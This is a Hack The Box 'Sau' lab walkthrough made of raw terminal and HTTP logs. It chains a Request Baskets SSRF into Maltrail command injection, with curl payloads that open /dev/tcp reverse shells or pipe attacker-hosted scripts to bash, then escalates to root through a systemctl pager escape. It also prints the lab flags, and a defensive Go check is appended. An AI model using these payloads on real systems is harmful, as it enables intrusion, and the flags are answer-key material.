https://app.hackthebox.com/machines/Sau
$ nmap -A 10.10.11.224 -T4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-30 15:36 HKT
Nmap scan report for 10.10.11.224
Host is up (0.66s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 (RSA)
|   256 ec2eb105872a0c7db149876495dc8a21 (ECDSA)
|_  256 b30c47fba2f212ccce0b58820e504336 (ED25519)
80/tcp    filtered http
55555/tcp open     unknown
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Sun, 30 Jul 2023 07:39:48 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[\w\d\-_\.]{1,250}$
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Sun, 30 Jul 2023 07:39:04 GMT
|     Content-Length: 27
|     <a href="/web">Found</a>.
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Sun, 30 Jul 2023 07:39:07 GMT
|_    Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
$ sudo masscan 10.10.11.224 -p1-65535 -i tun0
[sudo] password for kwkl:
Sorry, try again.
[sudo] password for kwkl:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2023-07-30 07:38:54 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 55555/tcp on 10.10.11.224
Discovered open port 22/tcp on 10.10.11.224
[Request Baskets web UI at http://10.10.11.224:55555/ (footer: Powered by Request Baskets | Version: 1.2.1). The "New Basket" form ("Create a basket to collect and inspect HTTP requests") accepts the name a0xd3ro and reports: Basket 'a0xd3ro' is successfully created! Your token is: f4K8SVw1vHre3oJngvf8HElZoOgLGsoye3ka7fsOTWNm. The page also carries the Master Token dialog text: "This service is running in restricted mode. Master token is required to create new baskets."]
[Description]
Request Baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.
------------------------------------------
[Vulnerability Type Other]
Server-Side Request Forgery (SSRF)
------------------------------------------
[Vendor of Product]
https://github.com/darklynx/request-baskets
------------------------------------------
[Affected Product Code Base]
request-baskets - version 1.2.1
------------------------------------------
[Affected Component]
The API endpoints /api/baskets/{name} and /baskets/{name} are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) via the forward_url parameter.
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Escalation of Privileges]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
POC: POST to the /api/baskets/{name} API with the payload {"forward_url": "http://127.0.0.1:80/test", "proxy_response": false, "insecure_tls": false, "expand_path": true, "capacity": 250}
Details: https://notes.sjtu.edu.cn/s/MUUhEymt7
------------------------------------------
[Discoverer]
beet1e
------------------------------------------
[Reference]
http://request-baskets.com
https://github.com/darklynx/request-baskets
https://notes.sjtu.edu.cn/s/MUUhEymt7
POST /api/baskets/q4tgdug2 HTTP/1.1
Host: 10.10.11.224:55555
Content-Length: 147
Accept: */*
X-Requested-With: XMLHttpRequest
Authorization: null
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Origin: http://10.10.11.224:55555
Referer: http://10.10.11.224:55555/web
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
{
"forward_url": "http://127.0.0.1:80/test",
"proxy_response": false,
"insecure_tls": false,
"expand_path": true,
"capacity": 250
}
HTTP/1.1 201 Created
Content-Type: application/json; charset=UTF-8
Date: Sun, 30 Jul 2023 12:35:31 GMT
Content-Length: 56
Connection: close
{"token":"PjX9v_Y5ZSuTSuCwpkFw_G8BoFFrI7pqdWfQzcuog1TI"}
Next:
POST /api/baskets/haha35 HTTP/1.1
Host: 10.10.11.224:55555
Content-Length: 142
Accept: */*
X-Requested-With: XMLHttpRequest
Authorization: null
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Origin: http://10.10.11.224:55555
Referer: http://10.10.11.224:55555/web
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
{
"forward_url": "http://127.0.0.1:80/",
"proxy_response": true,
"insecure_tls": false,
"expand_path": true,
"capacity": 250
}
HTTP/1.1 201 Created
Content-Type: application/json; charset=UTF-8
Date: Sun, 30 Jul 2023 12:40:47 GMT
Content-Length: 56
Connection: close
{"token":"Z8tVZ90iX7iu7dgYpnv-HMc8CmDVtFVk39XkCPXD7L_0"}
http://10.10.11.224:55555/haha35
[Opening that basket URL shows the Maltrail login page, with the footer "Powered by Maltrail (v0.53)".]
https://nvd.nist.gov/vuln/detail/CVE-2023-27163
https://github.com/spookier/Maltrail-v0.53-Exploit
POST /api/baskets/haha352 HTTP/1.1
Host: 10.10.11.224:55555
Content-Length: 147
Accept: */*
X-Requested-With: XMLHttpRequest
Authorization: null
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Origin: http://10.10.11.224:55555
Referer: http://10.10.11.224:55555/web
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
{
"forward_url": "http://127.0.0.1:80/login",
"proxy_response": true,
"insecure_tls": false,
"expand_path": true,
"capacity": 250
}
HTTP/1.1 201 Created
Content-Type: application/json; charset=UTF-8
Date: Sun, 30 Jul 2023 12:58:47 GMT
Content-Length: 56
Connection: close
{"token":"q8Urj-0YUEKHYxVTEGGmvKnPNpJN-vScNSmYuCfbmDRl"}
┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvvp 6666
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
id
http://10.10.11.224:55555/haha352
curl 'http://10.10.11.224:55555/haha352' \
--data 'username=;bash -i >& /dev/tcp/10.10.16.9/6666 0>&1'
curl 'http://10.10.11.224:55555/haha352' \
--data 'username=;http://10.10.16.9:5555/shell3.php | bash'
curl 'http://10.10.11.224:55555/haha352' \
--data 'username=;curl http://10.10.16.9:5555/shell3.php | bash'
┌──(kwkl㉿kwkl)-[~/HODL/htb]
└─$ curl 'http://10.10.11.224:55555/haha352' \
--data 'username=;`curl http://10.10.16.9:5555/shell3.php | bash`'
┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvvp 6666
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
id
Ncat: Connection from 10.10.11.224.
Ncat: Connection from 10.10.11.224:57512.
bash: cannot set terminal process group (887): Inappropriate ioctl for device
bash: no job control in this shell
puma@sau:/opt/maltrail$
puma@sau:/opt/maltrail$ id
uid=1001(puma) gid=1001(puma) groups=1001(puma)
puma@sau:/opt/maltrail$ id
id
uid=1001(puma) gid=1001(puma) groups=1001(puma)
puma@sau:/opt/maltrail$ ls
ls
CHANGELOG
CITATION.cff
LICENSE
README.md
core
docker
h
html
maltrail-sensor.service
maltrail-server.service
maltrail.conf
misc
plugins
requirements.txt
sensor.py
server.py
thirdparty
trails
puma@sau:/opt/maltrail$
puma@sau:~$ cat user.txt
cat user.txt
e8ea19ef627d286a17e25e0aa4420eb8
puma@sau:~$
puma@sau:/opt/maltrail$ id
id
uid=1001(puma) gid=1001(puma) groups=1001(puma)
puma@sau:/opt/maltrail$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User puma may run the following commands on sau:
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
puma@sau:/opt/maltrail$ ls -l /usr/bin/systemctl
ls -l /usr/bin/systemctl
-rwxr-xr-x 1 root root 996584 Mar 27 17:54 /usr/bin/systemctl
puma@sau:/opt/maltrail$
echo '[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/x.x.x.x/xxx 0>&1 2<&1"
[Install]
WantedBy=multi-user.target' > mm.service
# the generated unit is named mm.service
echo '[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.16.9/9999 0>&1 2<&1"
[Install]
WantedBy=multi-user.target' > mm.service
# the generated unit is named mm.service
puma@sau:~$ wget http://10.10.16.9:5555/mm.service
wget http://10.10.16.9:5555/mm.service
--2023-07-30 13:24:19-- http://10.10.16.9:5555/mm.service
Connecting to 10.10.16.9:5555... connected.
HTTP request sent, awaiting response... 200 OK
Length: 187 [application/octet-stream]
Saving to: ‘mm.service’
0K 100% 19.2M=0s
2023-07-30 13:24:21 (19.2 MB/s) - ‘mm.service’ saved [187/187]
puma@sau:~$ ls
ls
mm.service
user.txt
puma@sau:~$ mv mm.service /dev/shm
mv mm.service /dev/shm
puma@sau:~$ cat /dev/shm/mm.service
cat /dev/shm/mm.service
echo '[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.16.9/9999 0>&1 2<&1"
[Install]
WantedBy=multi-user.target' > mm.service
# the generated unit is named mm.service
puma@sau:~$ sudo systemctl link /dev/shm/mm.service
sudo systemctl link /dev/shm/mm.service
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
puma@sau:~$ sudo systemctl enable --now /dev/shm/mm.service\
sudo systemctl enable --now /dev/shm/mm.service\
>
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
puma@sau:~$
puma@sau:~$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User puma may run the following commands on sau:
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
puma@sau:~$
I can't let it run; keep studying.
puma@sau:/opt/maltrail$ sudo /usr/bin/systemctl status trail.service
sudo /usr/bin/systemctl status trail.service
WARNING: terminal is not fully functional
- (press RETURN)!sh
!!sshh!sh
# id
!id
sh: 1: !id: not found
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd
cd
# ls
ls
go root.txt
# cat root.txt
cat root.txt
8bb88ff1298f508794168692c33aedb7
#sudo /usr/bin/systemctl status trail.service
Ref:
https://techyrick.com/sau-htb-writeup/
https://gtfobins.github.io/gtfobins/systemctl/
https://gtfobins.github.io
https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/
REF:
Then, we log in to the administrator background:
The following API’s forward_url parameter is vulnerable to SSRF:
/api/baskets/{name}
/baskets/{name}
Let's take the /api/baskets/{name} API as an example; the other API has the same vulnerability.
We use the following payload to post /api/baskets/{name} API:
{
"forward_url": "http://127.0.0.1:80/test",
"proxy_response": false,
"insecure_tls": false,
"expand_path": true,
"capacity": 250
}
A direct POST only sets the URL; you need to visit the URL http://192.168.175.213:55555/test to trigger the SSRF vulnerability.
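A server-side check for the forward_url parameter described in the advisory and in the huntr notes above, as an added defensive example (not code from this writeup or from the request-baskets project): it rejects loopback, private and link-local targets before a basket is created, and resolves hostnames through an injected resolver so the demo runs on constructed records. LookupFunc, isInternal and ValidateForwardURL are names chosen here, and the .example hosts and their addresses are made up.

```go
package main

import (
	"fmt"
	"net"
	"net/url"
)

// LookupFunc resolves a hostname; injected so the check can run without DNS.
type LookupFunc func(host string) ([]net.IP, error)

// isInternal: loopback, private, link-local, unspecified or multicast targets,
// none of which a basket should be allowed to forward a request to.
func isInternal(ip net.IP) bool {
	return ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() ||
		ip.IsLinkLocalMulticast() || ip.IsUnspecified() || ip.IsMulticast()
}

// ValidateForwardURL accepts a forward_url only if it is http(s) and every address
// its host resolves to is public; any internal record rejects the whole URL.
func ValidateForwardURL(raw string, lookup LookupFunc) error {
	u, err := url.Parse(raw)
	if err != nil {
		return err
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return fmt.Errorf("scheme %q not allowed", u.Scheme)
	}
	host := u.Hostname()
	ips := []net.IP{net.ParseIP(host)} // a literal IP needs no lookup
	if ips[0] == nil {
		if ips, err = lookup(host); err != nil || len(ips) == 0 {
			return fmt.Errorf("cannot resolve host %q: %v", host, err)
		}
	}
	for _, ip := range ips {
		if isInternal(ip) {
			return fmt.Errorf("%s resolves to non-public address %s", host, ip)
		}
	}
	return nil
}

func main() {
	records := map[string][]net.IP{"intranet.example": {net.ParseIP("10.0.0.5")}} // constructed DNS
	lookup := func(h string) ([]net.IP, error) { return records[h], nil }
	for _, raw := range []string{"http://127.0.0.1:80/test", "http://intranet.example/", "https://203.0.113.10/"} {
		fmt.Printf("%-26s -> %v\n", raw, ValidateForwardURL(raw, lookup))
	}
}
```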